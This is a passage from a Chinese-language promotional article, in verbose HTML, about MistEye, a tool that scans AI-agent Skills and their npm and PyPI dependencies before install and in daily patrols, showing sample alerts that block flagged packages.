25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 情报来源: misteye_internal</span></span></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">⛔ 外链命中恶意标记，访问已阻断。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在这个场景中，MistEye 帮你挡掉了一次潜在的钓鱼访问——它发生在 AI 代理获取任何页面内容之前。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">场景三：装一个看起来很酷的第三方 Skill</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">你在 GitHub 上看到一个号称&#34;一键部署全栈应用&#34;的 Skill，想装来试试。它声明了 12 个 npm 依赖和 3 个 Python 依赖。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye 会在安装前递归扫描该 Skill 目录下的所有依赖声明文件，输出如下：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">🔍 威胁情报详情 — Skill 依赖递归扫描</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">扫描目录: awesome-fullstack-skill/</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">依赖声明文件: package.json (12 项), requirements.txt (3 项)</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">🚨 检测命中 (1 项):</span></span></b></p><b style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 目标: typo-crypto@4.3.0 (package:npm)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   证据: package.json:15</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   严重程度: Critical (危急)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   置信度: 100%</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   首次发现: 2026-05-06 08:12 UTC</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   情报来源: misteye_internal</span></span></b></b><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 检测覆盖: 14/15 依赖项已检测（含阻断项 1，实际检测 14）</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   通过: 13 项</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   命中: 1 项</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   未完成: 1 项（因命中阻断终止）</span></span></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">⛔ 依赖命中恶意标记，Skill 安装整体已阻断。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">15 个依赖中只要有一个命中，整个安装被阻断——不是&#34;检测到风险但你先装着&#34;。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">场景四：昨天装的 Skill，今天的巡检报了警</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">你昨天装了一个数据处理 Skill，安装时 15 个依赖全部通过前置检测。今天凌晨例行巡检完成后，你看到了这样一条通知：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">🚨 高危依赖巡检告警</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">🔍 巡检覆盖</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">  已安装目录: 8</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">  已扫描目录: 8</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">  依赖声明文件: 23</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">  成功解析: 23</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">  覆盖结论: 正常</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">🚨 检测命中 (1 项):</span></span></p><b style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 目标: jwrincident==1.0.1 (package:pypi)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   来源: my-data-skill/requirements.txt:3</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   严重程度: Critical (危急)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   置信度: 100%</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   首次发现: 2026-05-09 02:15 UTC</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">   情报来源: misteye_internal</span></span></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">[high-risk dependency patrol alert]</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">⚠️ 该依赖命中恶意标记，请立即人工复核，暂停相关 Skill 的安装/访问流程。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安装时安全的，不代表永远安全。威胁情报在持续更新，巡检就是这个&#34;持续回头看&#34;的动作。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这四个场景的核心逻辑是一致的：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">前置检测在危险动作之前拦一道，每日巡检在你忘记之后回头看——不增加操作，不改变习惯，只在风险出现时生效。</span></span></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">适用角色</span></span></h3></b><table style="min-width:191px;"><tbody><tr><td data-colwidth="166"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">角色</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">收益</span></span></p></td></tr><tr><td data-colwidth="166"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 